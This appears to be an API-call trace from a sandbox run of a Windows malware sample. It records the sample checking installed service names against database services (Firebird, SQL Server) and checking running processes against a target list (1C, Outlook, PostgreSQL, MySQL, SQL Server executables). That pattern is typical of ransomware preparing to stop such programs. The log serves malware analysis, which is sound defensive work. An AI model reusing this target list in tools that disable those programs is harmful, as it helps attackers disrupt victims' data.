	[0030.772] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0030.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0030.773] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0030.773] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0030.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0030.773] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0030.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0030.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0030.773] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0030.773] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0030.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0030.773] lstrlenW (lpString="AudioSrv") returned 8
	[0030.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0030.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0030.773] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0030.773] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0030.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0030.773] lstrlenW (lpString="BFE") returned 3
	[0030.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0030.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0030.773] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0030.773] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0030.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0030.773] lstrlenW (lpString="CryptSvc") returned 8
	[0030.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0030.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0030.773] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0030.773] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0030.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0030.773] lstrlenW (lpString="CscService") returned 10
	[0030.773] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0030.773] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0030.773] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0030.773] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0030.773] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0030.773] lstrlenW (lpString="DcomLaunch") returned 10
	[0030.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0030.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0030.774] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0030.774] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0030.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0030.774] lstrlenW (lpString="Dhcp") returned 4
	[0030.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0030.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0030.774] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0030.774] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0030.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0030.774] lstrlenW (lpString="Dnscache") returned 8
	[0030.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0030.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0030.774] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0030.774] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0030.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0030.774] lstrlenW (lpString="DPS") returned 3
	[0030.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0030.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0030.774] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0030.774] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0030.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0030.774] lstrlenW (lpString="eventlog") returned 8
	[0030.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0030.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0030.774] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0030.774] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0030.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0030.774] lstrlenW (lpString="EventSystem") returned 11
	[0030.774] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0030.774] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0030.774] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0030.774] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0030.774] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0030.775] lstrlenW (lpString="gpsvc") returned 5
	[0030.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0030.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0030.775] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0030.775] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0030.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0030.775] lstrlenW (lpString="iphlpsvc") returned 8
	[0030.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0030.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0030.775] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0030.775] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0030.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0030.775] lstrlenW (lpString="LanmanServer") returned 12
	[0030.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0030.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0030.775] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0030.775] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0030.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0030.775] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0030.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0030.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0030.775] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0030.775] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0030.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0030.775] lstrlenW (lpString="lmhosts") returned 7
	[0030.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0030.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0030.775] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0030.775] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0030.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0030.775] lstrlenW (lpString="MMCSS") returned 5
	[0030.775] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0030.775] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0030.775] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0030.775] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0030.775] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0030.776] lstrlenW (lpString="MpsSvc") returned 6
	[0030.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0030.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0030.776] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0030.776] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0030.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0030.776] lstrlenW (lpString="Netman") returned 6
	[0030.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0030.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0030.776] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0030.776] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0030.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0030.776] lstrlenW (lpString="netprofm") returned 8
	[0030.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0030.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0030.776] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0030.776] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0030.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0030.776] lstrlenW (lpString="NlaSvc") returned 6
	[0030.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0030.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0030.776] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0030.776] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0030.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0030.776] lstrlenW (lpString="nsi") returned 3
	[0030.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0030.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0030.776] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0030.776] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0030.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0030.776] lstrlenW (lpString="PcaSvc") returned 6
	[0030.776] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0030.776] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0030.776] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0030.776] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0030.776] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0030.777] lstrlenW (lpString="PlugPlay") returned 8
	[0030.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0030.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0030.777] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0030.777] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0030.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0030.777] lstrlenW (lpString="Power") returned 5
	[0030.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0030.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0030.777] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0030.777] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0030.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0030.777] lstrlenW (lpString="ProfSvc") returned 7
	[0030.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0030.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0030.777] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0030.777] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0030.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0030.777] lstrlenW (lpString="RpcEptMapper") returned 12
	[0030.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0030.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0030.777] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0030.777] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0030.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0030.777] lstrlenW (lpString="RpcSs") returned 5
	[0030.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0030.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0030.777] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0030.777] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0030.777] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0030.777] lstrlenW (lpString="SamSs") returned 5
	[0030.777] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0030.777] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0030.777] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0030.777] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0030.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0030.778] lstrlenW (lpString="Schedule") returned 8
	[0030.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0030.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0030.778] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0030.778] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0030.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0030.778] lstrlenW (lpString="SENS") returned 4
	[0030.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0030.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0030.778] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0030.778] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0030.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0030.778] lstrlenW (lpString="ShellHWDetection") returned 16
	[0030.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0030.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0030.778] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0030.778] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0030.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0030.778] lstrlenW (lpString="Spooler") returned 7
	[0030.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0030.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0030.778] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0030.778] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0030.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0030.778] lstrlenW (lpString="SysMain") returned 7
	[0030.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0030.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0030.778] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0030.778] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0030.778] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0030.778] lstrlenW (lpString="Themes") returned 6
	[0030.778] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0030.778] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0030.778] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0030.778] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0030.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0030.779] lstrlenW (lpString="TrkWks") returned 6
	[0030.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0030.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0030.779] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0030.779] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0030.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0030.779] lstrlenW (lpString="UxSms") returned 5
	[0030.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0030.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0030.779] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0030.779] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0030.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0030.779] lstrlenW (lpString="WdiServiceHost") returned 14
	[0030.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0030.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0030.779] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0030.779] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0030.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0030.779] lstrlenW (lpString="WdiSystemHost") returned 13
	[0030.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0030.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0030.779] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0030.779] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0030.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0030.779] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0030.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0030.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0030.779] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0030.779] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0030.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0030.779] lstrlenW (lpString="Winmgmt") returned 7
	[0030.779] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0030.779] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0030.779] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0030.779] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0030.779] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0030.780] lstrlenW (lpString="WPDBusEnum") returned 10
	[0030.780] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0030.780] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WPDBusEnum") returned -1
	[0030.780] lstrcmpiW (lpString1="sqlwriter", lpString2="WPDBusEnum") returned -1
	[0030.780] lstrcmpiW (lpString1="mssqlserver", lpString2="WPDBusEnum") returned -1
	[0030.780] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WPDBusEnum") returned -1
	[0030.780] HeapFree (in: hHeap=0x7d60000, dwFlags=0x0, lpMem=0x7df4510 | out: hHeap=0x7d60000) returned 1
	[0030.780] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe4
	[0030.783] Process32FirstW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0030.783] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4f, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0030.784] lstrlenW (lpString="System") returned 6
	[0030.784] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0030.784] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0030.784] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0030.784] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0030.784] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0030.784] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0030.784] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0030.784] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0030.784] lstrlenW (lpString="smss.exe") returned 8
	[0030.784] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0030.784] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0030.784] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0030.784] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0030.784] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0030.785] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0030.785] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0030.785] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0030.785] lstrlenW (lpString="csrss.exe") returned 9
	[0030.785] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0030.785] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0030.785] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0030.785] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0030.786] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0030.786] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0030.786] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0030.786] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0030.786] lstrlenW (lpString="wininit.exe") returned 11
	[0030.786] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0030.786] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0030.786] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0030.786] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0030.786] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0030.786] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0030.786] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0030.786] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0030.787] lstrlenW (lpString="csrss.exe") returned 9
	[0030.787] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0030.787] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0030.787] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0030.787] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0030.787] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0030.787] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0030.787] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0030.788] lstrlenW (lpString="winlogon.exe") returned 12
	[0030.788] Process32NextW (in: hSnapshot=0xe4, lppe=0x18f73c | out: lppe=0x18f73c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0030.788] lstrlenW (lpString="services.exe") returned 12
